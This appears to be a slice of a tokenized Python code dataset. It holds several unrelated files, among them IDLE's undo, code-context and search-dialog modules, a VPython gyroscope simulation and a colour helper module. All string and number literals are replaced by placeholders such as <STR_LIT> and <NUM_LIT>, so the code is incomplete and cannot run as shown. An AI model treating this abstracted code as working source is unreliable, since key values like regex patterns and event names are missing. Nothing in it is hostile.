"<STR_LIT:\n>" ) <EOL> i = <NUM_LIT:0> <EOL> n = len ( lines ) <EOL> while i < n and is_all_white ( lines [ i ] ) : <EOL> i = i + <NUM_LIT:1> <EOL> if i >= n : <EOL> return data <EOL> indent1 = get_indent ( lines [ i ] ) <EOL> if i + <NUM_LIT:1> < n and not is_all_white ( lines [ i + <NUM_LIT:1> ] ) : <EOL> indent2 = get_indent ( lines [ i + <NUM_LIT:1> ] ) <EOL> else : <EOL> indent2 = indent1 <EOL> new = lines [ : i ] <EOL> partial = indent1 <EOL> while i < n and not is_all_white ( lines [ i ] ) : <EOL> words = re . split ( "<STR_LIT>" , lines [ i ] ) <EOL> for j in range ( <NUM_LIT:0> , len ( words ) , <NUM_LIT:2> ) : <EOL> word = words [ j ] <EOL> if not word : <EOL> continue <EOL> if len ( ( partial + word ) . expandtabs ( ) ) > limit and partial != indent1 : <EOL> new . append ( partial . rstrip ( ) ) <EOL> partial = indent2 <EOL> partial = partial + word + "<STR_LIT:U+0020>" <EOL> if j + <NUM_LIT:1> < len ( words ) and words [ j + <NUM_LIT:1> ] != "<STR_LIT:U+0020>" : <EOL> partial = partial + "<STR_LIT:U+0020>" <EOL> i = i + <NUM_LIT:1> <EOL> new . append ( partial . rstrip ( ) ) <EOL> new . extend ( lines [ i : ] ) <EOL> return "<STR_LIT:\n>" . join ( new ) <EOL> def is_all_white ( line ) : <EOL> return re . match ( r"<STR_LIT>" , line ) is not None <EOL> def get_indent ( line ) : <EOL> return re . match ( r"<STR_LIT>" , line ) . group ( ) <EOL> def get_comment_header ( line ) : <EOL> m = re . match ( r"<STR_LIT>" , line ) <EOL> if m is None : return "<STR_LIT>" <EOL> return m . group ( <NUM_LIT:1> ) </s>
<s> import string <EOL> from Tkinter import * <EOL> from Delegator import Delegator <EOL> class UndoDelegator ( Delegator ) : <EOL> max_undo = <NUM_LIT:1000> <EOL> def __init__ ( self ) : <EOL> Delegator . __init__ ( self ) <EOL> self . reset_undo ( ) <EOL> def setdelegate ( self , delegate ) : <EOL> if self . delegate is not None : <EOL> self . unbind ( "<STR_LIT>" ) <EOL> self . unbind ( "<STR_LIT>" ) <EOL> self . unbind ( "<STR_LIT>" ) <EOL> Delegator . setdelegate ( self , delegate ) <EOL> if delegate is not None : <EOL> self . bind ( "<STR_LIT>" , self . undo_event ) <EOL> self . bind ( "<STR_LIT>" , self . redo_event ) <EOL> self . bind ( "<STR_LIT>" , self . dump_event ) <EOL> def dump_event ( self , event ) : <EOL> from pprint import pprint <EOL> pprint ( self . undolist [ : self . pointer ] ) <EOL> print "<STR_LIT>" , self . pointer , <EOL> print "<STR_LIT>" , self . saved , <EOL> print "<STR_LIT>" , self . can_merge , <EOL> print "<STR_LIT>" , self . get_saved ( ) <EOL> pprint ( self . undolist [ self . pointer : ] ) <EOL> return "<STR_LIT>" <EOL> def reset_undo ( self ) : <EOL> self . was_saved = - <NUM_LIT:1> <EOL> self . pointer = <NUM_LIT:0> <EOL> self . undolist = [ ] <EOL> self . undoblock = <NUM_LIT:0> <EOL> self . set_saved ( <NUM_LIT:1> ) <EOL> def set_saved ( self , flag ) : <EOL> if flag : <EOL> self . saved = self . pointer <EOL> else : <EOL> self . saved = - <NUM_LIT:1> <EOL> self . can_merge = False <EOL> self . check_saved ( ) <EOL> def get_saved ( self ) : <EOL> return self . saved == self . pointer <EOL> saved_change_hook = None <EOL> def set_saved_change_hook ( self , hook ) : <EOL> self . saved_change_hook = hook <EOL> was_saved = - <NUM_LIT:1> <EOL> def check_saved ( self ) : <EOL> is_saved = self . get_saved ( ) <EOL> if is_saved != self . was_saved : <EOL> self . was_saved = is_saved <EOL> if self . saved_change_hook : <EOL> self . saved_change_hook ( ) <EOL> def insert ( self , index , chars , tags = None ) : <EOL> self . addcmd ( InsertCommand ( index , chars , tags ) ) <EOL> def delete ( self , index1 , index2 = None ) : <EOL> self . addcmd ( DeleteCommand ( index1 , index2 ) ) <EOL> def undo_block_start ( self ) : <EOL> if self . undoblock == <NUM_LIT:0> : <EOL> self . undoblock = CommandSequence ( ) <EOL> self . undoblock . bump_depth ( ) <EOL> def undo_block_stop ( self ) : <EOL> if self . undoblock . bump_depth ( - <NUM_LIT:1> ) == <NUM_LIT:0> : <EOL> cmd = self . undoblock <EOL> self . undoblock = <NUM_LIT:0> <EOL> if len ( cmd ) > <NUM_LIT:0> : <EOL> if len ( cmd ) == <NUM_LIT:1> : <EOL> cmd = cmd . getcmd ( <NUM_LIT:0> ) <EOL> self . addcmd ( cmd , <NUM_LIT:0> ) <EOL> def addcmd ( self , cmd , execute = True ) : <EOL> if execute : <EOL> cmd . do ( self . delegate ) <EOL> if self . undoblock != <NUM_LIT:0> : <EOL> self . undoblock . append ( cmd ) <EOL> return <EOL> if self . can_merge and self . pointer > <NUM_LIT:0> : <EOL> lastcmd = self . undolist [ self . pointer - <NUM_LIT:1> ] <EOL> if lastcmd . merge ( cmd ) : <EOL> return <EOL> self . undolist [ self . pointer : ] = [ cmd ] <EOL> if self . saved > self . pointer : <EOL> self . saved = - <NUM_LIT:1> <EOL> self . pointer = self . pointer + <NUM_LIT:1> <EOL> if len ( self . undolist ) > self . max_undo : <EOL> del self . undolist [ <NUM_LIT:0> ] <EOL> self . pointer = self . pointer - <NUM_LIT:1> <EOL> if self . saved >= <NUM_LIT:0> : <EOL> self . saved = self . saved - <NUM_LIT:1> <EOL> self . can_merge = True <EOL> self . check_saved ( ) <EOL> def undo_event ( self , event ) : <EOL> if self . pointer == <NUM_LIT:0> : <EOL> self . bell ( ) <EOL> return "<STR_LIT>" <EOL> cmd = self . undolist [ self . pointer - <NUM_LIT:1> ] <EOL> cmd . undo ( self . delegate ) <EOL> self . pointer = self . pointer - <NUM_LIT:1> <EOL> self . can_merge = False <EOL> self . check_saved ( ) <EOL> return "<STR_LIT>" <EOL> def redo_event ( self , event ) : <EOL> if self . pointer >= len ( self . undolist ) : <EOL> self . bell ( ) <EOL> return "<STR_LIT>" <EOL> cmd = self . undolist [ self . pointer ] <EOL> cmd . redo ( self . delegate ) <EOL> self . pointer = self . pointer + <NUM_LIT:1> <EOL> self . can_merge = False <EOL> self . check_saved ( ) <EOL> return "<STR_LIT>" <EOL> class Command : <EOL> tags = None <EOL> def __init__ ( self , index1 , index2 , chars , tags = None ) : <EOL> self . marks_before = { } <EOL> self . marks_after = { } <EOL> self . index1 = index1 <EOL> self . index2 = index2 <EOL> self . chars = chars <EOL> if tags : <EOL> self . tags = tags <EOL> def __repr__ ( self ) : <EOL> s = self . __class__ . __name__ <EOL> t = ( self . index1 , self . index2 , self . chars , self . tags ) <EOL> if self . tags is None : <EOL> t = t [ : - <NUM_LIT:1> ] <EOL> return s + repr ( t ) <EOL> def do ( self , text ) : <EOL> pass <EOL> def redo ( self , text ) : <EOL> pass <EOL> def undo ( self , text ) : <EOL> pass <EOL> def merge ( self , cmd ) : <EOL> return <NUM_LIT:0> <EOL> def save_marks ( self , text ) : <EOL> marks = { } <EOL> for name in text . mark_names ( ) : <EOL> if name != "<STR_LIT>" and name != "<STR_LIT>" : <EOL> marks [ name ] = text . index ( name ) <EOL> return marks <EOL> def set_marks ( self , text , marks ) : <EOL> for name , index in marks . items ( ) : <EOL> text . mark_set ( name , index ) <EOL> class InsertCommand ( Command ) : <EOL> def __init__ ( self , index1 , chars , tags = None ) : <EOL> Command . __init__ ( self , index1 , None , chars , tags ) <EOL> def do ( self , text ) : <EOL> self . marks_before = self . save_marks ( text ) <EOL> self . index1 = text . index ( self . index1 ) <EOL> if text . compare ( self . index1 , "<STR_LIT:>>" , "<STR_LIT>" ) : <EOL> self . index1 = text . index ( "<STR_LIT>" ) <EOL> text . insert ( self . index1 , self . chars , self . tags ) <EOL> self . index2 = text . index ( "<STR_LIT>" % ( self . index1 , len ( self . chars ) ) ) <EOL> self . marks_after = self . save_marks ( text ) <EOL> def redo ( self , text ) : <EOL> text . mark_set ( '<STR_LIT>' , self . index1 ) <EOL> text . insert ( self . index1 , self . chars , self . tags ) <EOL> self . set_marks ( text , self . marks_after ) <EOL> text . see ( '<STR_LIT>' ) <EOL> def undo ( self , text ) : <EOL> text . mark_set ( '<STR_LIT>' , self . index1 ) <EOL> text . delete ( self . index1 , self . index2 ) <EOL> self . set_marks ( text , self . marks_before ) <EOL> text . see ( '<STR_LIT>' ) <EOL> def merge ( self , cmd ) : <EOL> if self . __class__ is not cmd . __class__ : <EOL> return False <EOL> if self . index2 != cmd . index1 : <EOL> return False <EOL> if self . tags != cmd . tags : <EOL> return False <EOL> if len ( cmd . chars ) != <NUM_LIT:1> : <EOL> return False <EOL> if self . chars and self . classify ( self . chars [ - <NUM_LIT:1> ] ) != self . classify ( cmd . chars ) : <EOL> return False <EOL> self . index2 = cmd . index2 <EOL> self . chars = self . chars + cmd . chars <EOL> return True <EOL> alphanumeric = string . ascii_letters + string . digits + "<STR_LIT:_>" <EOL> def classify ( self , c ) : <EOL> if c in self . alphanumeric : <EOL> return "<STR_LIT>" <EOL> if c == "<STR_LIT:\n>" : <EOL> return "<STR_LIT>" <EOL> return "<STR_LIT>" <EOL> class DeleteCommand ( Command ) : <EOL> def __init__ ( self , index1 , index2 = None ) : <EOL> Command . __init__ ( self , index1 , index2 , None , None ) <EOL> def do ( self , text ) : <EOL> self . marks_before = self . save_marks ( text ) <EOL> self . index1 = text . index ( self . index1 ) <EOL> if self . index2 : <EOL> self . index2 = text . index ( self . index2 ) <EOL> else : <EOL> self . index2 = text . index ( self . index1 + "<STR_LIT>" ) <EOL> if text . compare ( self . index2 , "<STR_LIT:>>" , "<STR_LIT>" ) : <EOL> self . index2 = text . index ( "<STR_LIT>" ) <EOL> self . chars = text . get ( self . index1 , self . index2 ) <EOL> text . delete ( self . index1 , self . index2 ) <EOL> self . marks_after = self . save_marks ( text ) <EOL> def redo ( self , text ) : <EOL> text . mark_set ( '<STR_LIT>' , self . index1 ) <EOL> text . delete ( self . index1 , self . index2 ) <EOL> self . set_marks ( text , self . marks_after ) <EOL> text . see ( '<STR_LIT>' ) <EOL> def undo ( self , text ) : <EOL> text . mark_set ( '<STR_LIT>' , self . index1 ) <EOL> text . insert ( self . index1 , self . chars ) <EOL> self . set_marks ( text , self . marks_before ) <EOL> text . see ( '<STR_LIT>' ) <EOL> class CommandSequence ( Command ) : <EOL> def __init__ ( self ) : <EOL> self . cmds = [ ] <EOL> self . depth = <NUM_LIT:0> <EOL> def __repr__ ( self ) : <EOL> s = self . __class__ . __name__ <EOL> strs = [ ] <EOL> for cmd in self . cmds : <EOL> strs . append ( "<STR_LIT>" % ( cmd , ) ) <EOL> return s + "<STR_LIT>" + "<STR_LIT>" . join ( strs ) + "<STR_LIT>" <EOL> def __len__ ( self ) : <EOL> return len ( self . cmds ) <EOL> def append ( self , cmd ) : <EOL> self . cmds . append ( cmd ) <EOL> def getcmd ( self , i ) : <EOL> return self . cmds [ i ] <EOL> def redo ( self , text ) : <EOL> for cmd in self . cmds : <EOL> cmd . redo ( text ) <EOL> def undo ( self , text ) : <EOL> cmds = self . cmds [ : ] <EOL> cmds . reverse ( ) <EOL> for cmd in cmds : <EOL> cmd . undo ( text ) <EOL> def bump_depth ( self , incr = <NUM_LIT:1> ) : <EOL> self . depth = self . depth + incr <EOL> return self . depth <EOL> def main ( ) : <EOL> from Percolator import Percolator <EOL> root = Tk ( ) <EOL> root . wm_protocol ( "<STR_LIT>" , root . quit ) <EOL> text = Text ( ) <EOL> text . pack ( ) <EOL> text . focus_set ( ) <EOL> p = Percolator ( text ) <EOL> d = UndoDelegator ( ) <EOL> p . insertfilter ( d ) <EOL> root . mainloop ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> import tkinter <EOL> from tkinter . constants import TOP , LEFT , X , W , SUNKEN <EOL> import re <EOL> from sys import maxsize as INFINITY <EOL> from . configHandler import idleConf <EOL> BLOCKOPENERS = set ( [ "<STR_LIT:class>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> UPDATEINTERVAL = <NUM_LIT:100> <EOL> FONTUPDATEINTERVAL = <NUM_LIT:1000> <EOL> getspacesfirstword = lambda s , c = re . compile ( r"<STR_LIT>" ) : c . match ( s ) . groups ( ) <EOL> class CodeContext : <EOL> menudefs = [ ( '<STR_LIT>' , [ ( '<STR_LIT>' , '<STR_LIT>' ) ] ) ] <EOL> context_depth = idleConf . GetOption ( "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , type = "<STR_LIT:int>" , default = <NUM_LIT:3> ) <EOL> bgcolor = idleConf . GetOption ( "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , type = "<STR_LIT:str>" , default = "<STR_LIT>" ) <EOL> fgcolor = idleConf . GetOption ( "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , type = "<STR_LIT:str>" , default = "<STR_LIT>" ) <EOL> def __init__ ( self , editwin ) : <EOL> self . editwin = editwin <EOL> self . text = editwin . text <EOL> self . textfont = self . text [ "<STR_LIT>" ] <EOL> self . label = None <EOL> self . info = [ ( <NUM_LIT:0> , - <NUM_LIT:1> , "<STR_LIT>" , False ) ] <EOL> self . topvisible = <NUM_LIT:1> <EOL> visible = idleConf . GetOption ( "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , type = "<STR_LIT:bool>" , default = False ) <EOL> if visible : <EOL> self . toggle_code_context_event ( ) <EOL> self . editwin . setvar ( '<STR_LIT>' , True ) <EOL> self . text . after ( UPDATEINTERVAL , self . timer_event ) <EOL> self . text . after ( FONTUPDATEINTERVAL , self . font_timer_event ) <EOL> def toggle_code_context_event ( self , event = None ) : <EOL> if not self . label : <EOL> widgets = self . editwin . text , self . editwin . text_frame <EOL> padx = <NUM_LIT:0> <EOL> for widget in widgets : <EOL> padx += int ( str ( widget . pack_info ( ) [ '<STR_LIT>' ] ) ) <EOL> padx += int ( str ( widget . cget ( '<STR_LIT>' ) ) ) <EOL> border = <NUM_LIT:0> <EOL> for widget in widgets : <EOL> border += int ( str ( widget . cget ( '<STR_LIT>' ) ) ) <EOL> self . label = tkinter . Label ( self . editwin . top , <EOL> text = "<STR_LIT:\n>" * ( self . context_depth - <NUM_LIT:1> ) , <EOL> anchor = W , justify = LEFT , <EOL> font = self . textfont , <EOL> bg = self . bgcolor , fg = self . fgcolor , <EOL> width = <NUM_LIT:1> , <EOL> padx = padx , border = border , <EOL> relief = SUNKEN ) <EOL> self . label . pack ( side = TOP , fill = X , expand = False , <EOL> before = self . editwin . text_frame ) <EOL> else : <EOL> self . label . destroy ( ) <EOL> self . label = None <EOL> idleConf . SetOption ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> str ( self . label is not None ) ) <EOL> idleConf . SaveUserCfgFiles ( ) <EOL> def get_line_info ( self , linenum ) : <EOL> """<STR_LIT>""" <EOL> text = self . text . get ( "<STR_LIT>" % linenum , "<STR_LIT>" % linenum ) <EOL> spaces , firstword = getspacesfirstword ( text ) <EOL> opener = firstword in BLOCKOPENERS and firstword <EOL> if len ( text ) == len ( spaces ) or text [ len ( spaces ) ] == '<STR_LIT:#>' : <EOL> indent = INFINITY <EOL> else : <EOL> indent = len ( spaces ) <EOL> return indent , text , opener <EOL> def get_context ( self , new_topvisible , stopline = <NUM_LIT:1> , stopindent = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> assert stopline > <NUM_LIT:0> <EOL> lines = [ ] <EOL> lastindent = INFINITY <EOL> for linenum in range ( new_topvisible , stopline - <NUM_LIT:1> , - <NUM_LIT:1> ) : <EOL> indent , text , opener = self . get_line_info ( linenum ) <EOL> if indent < lastindent : <EOL> lastindent = indent <EOL> if opener in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> lastindent += <NUM_LIT:1> <EOL> if opener and linenum < new_topvisible and indent >= stopindent : <EOL> lines . append ( ( linenum , indent , text , opener ) ) <EOL> if lastindent <= stopindent : <EOL> break <EOL> lines . reverse ( ) <EOL> return lines , lastindent <EOL> def update_code_context ( self ) : <EOL> """<STR_LIT>""" <EOL> new_topvisible = int ( self . text . index ( "<STR_LIT>" ) . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] ) <EOL> if self . topvisible == new_topvisible : <EOL> return <EOL> if self . topvisible < new_topvisible : <EOL> lines , lastindent = self . get_context ( new_topvisible , <EOL> self . topvisible ) <EOL> while self . info [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] >= lastindent : <EOL> del self . info [ - <NUM_LIT:1> ] <EOL> elif self . topvisible > new_topvisible : <EOL> stopindent = self . info [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] + <NUM_LIT:1> <EOL> while self . info [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] >= new_topvisible : <EOL> stopindent = self . info [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] <EOL> del self . info [ - <NUM_LIT:1> ] <EOL> lines , lastindent = self . get_context ( new_topvisible , <EOL> self . info [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] + <NUM_LIT:1> , <EOL> stopindent ) <EOL> self . info . extend ( lines ) <EOL> self . topvisible = new_topvisible <EOL> context_strings = [ "<STR_LIT>" ] * max ( <NUM_LIT:0> , self . context_depth - len ( self . info ) ) <EOL> context_strings += [ x [ <NUM_LIT:2> ] for x in self . info [ - self . context_depth : ] ] <EOL> self . label [ "<STR_LIT:text>" ] = '<STR_LIT:\n>' . join ( context_strings ) <EOL> def timer_event ( self ) : <EOL> if self . label : <EOL> self . update_code_context ( ) <EOL> self . text . after ( UPDATEINTERVAL , self . timer_event ) <EOL> def font_timer_event ( self ) : <EOL> newtextfont = self . text [ "<STR_LIT>" ] <EOL> if self . label and newtextfont != self . textfont : <EOL> self . textfont = newtextfont <EOL> self . label [ "<STR_LIT>" ] = self . textfont <EOL> self . text . after ( FONTUPDATEINTERVAL , self . font_timer_event ) </s>
<s> from tkinter import * <EOL> class SearchDialogBase : <EOL> title = "<STR_LIT>" <EOL> icon = "<STR_LIT>" <EOL> needwrapbutton = <NUM_LIT:1> <EOL> def __init__ ( self , root , engine ) : <EOL> self . root = root <EOL> self . engine = engine <EOL> self . top = None <EOL> def open ( self , text , searchphrase = None ) : <EOL> self . text = text <EOL> if not self . top : <EOL> self . create_widgets ( ) <EOL> else : <EOL> self . top . deiconify ( ) <EOL> self . top . tkraise ( ) <EOL> if searchphrase : <EOL> self . ent . delete ( <NUM_LIT:0> , "<STR_LIT:end>" ) <EOL> self . ent . insert ( "<STR_LIT:end>" , searchphrase ) <EOL> self . ent . focus_set ( ) <EOL> self . ent . selection_range ( <NUM_LIT:0> , "<STR_LIT:end>" ) <EOL> self . ent . icursor ( <NUM_LIT:0> ) <EOL> self . top . grab_set ( ) <EOL> def close ( self , event = None ) : <EOL> if self . top : <EOL> self . top . grab_release ( ) <EOL> self . top . withdraw ( ) <EOL> def create_widgets ( self ) : <EOL> top = Toplevel ( self . root ) <EOL> top . bind ( "<STR_LIT>" , self . default_command ) <EOL> top . bind ( "<STR_LIT>" , self . close ) <EOL> top . protocol ( "<STR_LIT>" , self . close ) <EOL> top . wm_title ( self . title ) <EOL> top . wm_iconname ( self . icon ) <EOL> self . top = top <EOL> self . row = <NUM_LIT:0> <EOL> self . top . grid_columnconfigure ( <NUM_LIT:0> , pad = <NUM_LIT:2> , weight = <NUM_LIT:0> ) <EOL> self . top . grid_columnconfigure ( <NUM_LIT:1> , pad = <NUM_LIT:2> , minsize = <NUM_LIT:100> , weight = <NUM_LIT:100> ) <EOL> self . create_entries ( ) <EOL> self . create_option_buttons ( ) <EOL> self . create_other_buttons ( ) <EOL> return self . create_command_buttons ( ) <EOL> def make_entry ( self , label , var ) : <EOL> l = Label ( self . top , text = label ) <EOL> l . grid ( row = self . row , column = <NUM_LIT:0> , sticky = "<STR_LIT>" ) <EOL> e = Entry ( self . top , textvariable = var , exportselection = <NUM_LIT:0> ) <EOL> e . grid ( row = self . row , column = <NUM_LIT:1> , sticky = "<STR_LIT>" ) <EOL> self . row = self . row + <NUM_LIT:1> <EOL> return e <EOL> def make_frame ( self , labeltext = None ) : <EOL> if labeltext : <EOL> l = Label ( self . top , text = labeltext ) <EOL> l . grid ( row = self . row , column = <NUM_LIT:0> , sticky = "<STR_LIT>" ) <EOL> f = Frame ( self . top ) <EOL> f . grid ( row = self . row , column = <NUM_LIT:1> , columnspan = <NUM_LIT:1> , sticky = "<STR_LIT>" ) <EOL> self . row = self . row + <NUM_LIT:1> <EOL> return f <EOL> def make_button ( self , label , command , isdef = <NUM_LIT:0> ) : <EOL> b = Button ( self . buttonframe , <EOL> text = label , command = command , <EOL> default = isdef and "<STR_LIT>" or "<STR_LIT>" ) <EOL> cols , rows = self . buttonframe . grid_size ( ) <EOL> b . grid ( pady = <NUM_LIT:1> , row = rows , column = <NUM_LIT:0> , sticky = "<STR_LIT>" ) <EOL> self . buttonframe . grid ( rowspan = rows + <NUM_LIT:1> ) <EOL> return b <EOL> def create_entries ( self ) : <EOL> self . ent = self . make_entry ( "<STR_LIT>" , self . engine . patvar ) <EOL> def create_option_buttons ( self ) : <EOL> f = self . make_frame ( "<STR_LIT>" ) <EOL> btn = Checkbutton ( f , anchor = "<STR_LIT:w>" , <EOL> variable = self . engine . revar , <EOL> text = "<STR_LIT>" ) <EOL> btn . pack ( side = "<STR_LIT:left>" , fill = "<STR_LIT>" ) <EOL> if self . engine . isre ( ) : <EOL> btn . select ( ) <EOL> btn = Checkbutton ( f , anchor = "<STR_LIT:w>" , <EOL> variable = self . engine . casevar , <EOL> text = "<STR_LIT>" ) <EOL> btn . pack ( side = "<STR_LIT:left>" , fill = "<STR_LIT>" ) <EOL> if self . engine . iscase ( ) : <EOL> btn . select ( ) <EOL> btn = Checkbutton ( f , anchor = "<STR_LIT:w>" , <EOL> variable = self . engine . wordvar , <EOL> text = "<STR_LIT>" ) <EOL> btn . pack ( side = "<STR_LIT:left>" , fill = "<STR_LIT>" ) <EOL> if self . engine . isword ( ) : <EOL> btn . select ( ) <EOL> if self . needwrapbutton : <EOL> btn = Checkbutton ( f , anchor = "<STR_LIT:w>" , <EOL> variable = self . engine . wrapvar , <EOL> text = "<STR_LIT>" ) <EOL> btn . pack ( side = "<STR_LIT:left>" , fill = "<STR_LIT>" ) <EOL> if self . engine . iswrap ( ) : <EOL> btn . select ( ) <EOL> def create_other_buttons ( self ) : <EOL> f = self . make_frame ( "<STR_LIT>" ) <EOL> btn = Radiobutton ( f , anchor = "<STR_LIT:w>" , <EOL> variable = self . engine . backvar , value = <NUM_LIT:1> , <EOL> text = "<STR_LIT>" ) <EOL> btn . pack ( side = "<STR_LIT:left>" , fill = "<STR_LIT>" ) <EOL> if self . engine . isback ( ) : <EOL> btn . select ( ) <EOL> btn = Radiobutton ( f , anchor = "<STR_LIT:w>" , <EOL> variable = self . engine . backvar , value = <NUM_LIT:0> , <EOL> text = "<STR_LIT>" ) <EOL> btn . pack ( side = "<STR_LIT:left>" , fill = "<STR_LIT>" ) <EOL> if not self . engine . isback ( ) : <EOL> btn . select ( ) <EOL> def create_command_buttons ( self ) : <EOL> f = self . buttonframe = Frame ( self . top ) <EOL> f . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:2> , padx = <NUM_LIT:2> , pady = <NUM_LIT:2> , ipadx = <NUM_LIT:2> , ipady = <NUM_LIT:2> ) <EOL> b = self . make_button ( "<STR_LIT>" , self . close ) <EOL> b . lower ( ) </s>
<s> from visual_common . graph import * </s>
<s> from visual import * <EOL> scene . width = <NUM_LIT> <EOL> scene . height = <NUM_LIT> <EOL> scene . title = '<STR_LIT>' <EOL> Lshaft = <NUM_LIT:1.> <EOL> r = Lshaft / <NUM_LIT> <EOL> Rshaft = <NUM_LIT> <EOL> M = <NUM_LIT:1.> <EOL> Rrotor = <NUM_LIT> <EOL> Drotor = <NUM_LIT:0.1> <EOL> I3 = <NUM_LIT:0.5> * M * Rrotor ** <NUM_LIT:2> <EOL> I1 = M * r ** <NUM_LIT:2> + <NUM_LIT> * I3 <EOL> hpedestal = Lshaft <EOL> wpedestal = <NUM_LIT:0.1> <EOL> tbase = <NUM_LIT> <EOL> wbase = <NUM_LIT:3> * wpedestal <EOL> g = <NUM_LIT> <EOL> Fgrav = vector ( <NUM_LIT:0> , - M * g , <NUM_LIT:0> ) <EOL> top = vector ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> theta = <NUM_LIT> * pi <EOL> thetadot = <NUM_LIT:0> <EOL> psi = <NUM_LIT:0> <EOL> psidot = <NUM_LIT:30> <EOL> phi = - pi / <NUM_LIT:2> <EOL> phidot = <NUM_LIT:0> <EOL> if False : <EOL> a = ( <NUM_LIT:1> - I3 / I1 ) * sin ( theta ) * cos ( theta ) <EOL> b = - ( I3 / I1 ) * psidot * sin ( theta ) <EOL> c = M * g * r * sin ( theta ) / I1 <EOL> phidot = ( - b + sqrt ( b ** <NUM_LIT:2> - <NUM_LIT:4> * a * c ) ) / ( <NUM_LIT:2> * a ) <EOL> pedestal = box ( pos = top - vector ( <NUM_LIT:0> , hpedestal / <NUM_LIT> , <NUM_LIT:0> ) , <EOL> height = hpedestal , length = wpedestal , width = wpedestal , <EOL> color = ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.5> ) ) <EOL> base = box ( pos = top - vector ( <NUM_LIT:0> , hpedestal + tbase / <NUM_LIT> , <NUM_LIT:0> ) , <EOL> height = tbase , length = wbase , width = wbase , <EOL> color = pedestal . color ) <EOL> gyro = frame ( axis = ( sin ( theta ) * sin ( phi ) , cos ( theta ) , sin ( theta ) * cos ( phi ) ) ) <EOL> shaft = cylinder ( axis = ( Lshaft , <NUM_LIT:0> , <NUM_LIT:0> ) , radius = Rshaft , color = color . green , <EOL> material = materials . rough , frame = gyro ) <EOL> rotor = cylinder ( pos = ( Lshaft / <NUM_LIT:2> - Drotor / <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:0> ) , <EOL> axis = ( Drotor , <NUM_LIT:0> , <NUM_LIT:0> ) , radius = Rrotor , color = color . gray ( <NUM_LIT> ) , <EOL> material = materials . rough , frame = gyro ) <EOL> tip = sphere ( pos = gyro . pos + gyro . axis * Lshaft , color = color . yellow , <EOL> radius = <NUM_LIT> * shaft . radius , make_trail = True , <EOL> interval = <NUM_LIT:5> , retain = <NUM_LIT> ) <EOL> tip . trail_object . radius = <NUM_LIT> * shaft . radius <EOL> scene . autoscale = <NUM_LIT:0> <EOL> dt = <NUM_LIT> <EOL> t = <NUM_LIT:0.> <EOL> Nsteps = <NUM_LIT:20> <EOL> while True : <EOL> rate ( <NUM_LIT:100> ) <EOL> for step in range ( Nsteps ) : <EOL> atheta = sin ( theta ) * cos ( theta ) * phidot ** <NUM_LIT:2> + ( <EOL> M * g * r * sin ( theta ) - I3 * ( psidot + phidot * cos ( theta ) ) * phidot * sin ( theta ) ) / I1 <EOL> aphi = ( I3 / I1 ) * ( psidot + phidot * cos ( theta ) ) * thetadot / sin ( theta ) - <NUM_LIT:2> * cos ( theta ) * thetadot * phidot / sin ( theta ) <EOL> apsi = phidot * thetadot * sin ( theta ) - aphi * cos ( theta ) <EOL> thetadot += atheta * dt <EOL> phidot += aphi * dt <EOL> psidot += apsi * dt <EOL> theta += thetadot * dt <EOL> phi += phidot * dt <EOL> psi += psidot * dt <EOL> gyro . axis = vector ( sin ( theta ) * sin ( phi ) , cos ( theta ) , sin ( theta ) * cos ( phi ) ) <EOL> gyro . rotate ( angle = psidot * dt * Nsteps ) <EOL> tip . pos = gyro . pos + gyro . axis * Lshaft <EOL> t = t + dt * Nsteps </s>
<s> import colorsys <EOL> black = ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> white = ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> red = ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> green = ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> blue = ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> yellow = ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> cyan = ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> magenta = ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> orange = ( <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> def gray ( luminance ) : <EOL> return ( luminance , luminance , luminance ) <EOL> def rgb_to_hsv ( T ) : <EOL> if len ( T ) > <NUM_LIT:3> : <EOL> T = T [ : <NUM_LIT:3> ] <EOL> return colorsys . rgb_to_hsv ( * T ) <EOL> def hsv_to_rgb ( T ) : <EOL> if len ( T ) > <NUM_LIT:3> : <EOL> T = T [ : <NUM_LIT:3> ] <EOL> return colorsys . hsv_to_rgb ( * T ) <EOL> def rgb_to_grayscale ( T ) : <EOL> if len ( T ) > <NUM_LIT:3> : <EOL> T = T [ : <NUM_LIT:3> ] <EOL> luminance = <NUM_LIT> * T [ <NUM_LIT:0> ] + <NUM_LIT> * T [ <NUM_LIT:1> ] + <NUM_LIT> * T [ <NUM_LIT:2> ] <EOL> return ( luminance , luminance , luminance ) </s>
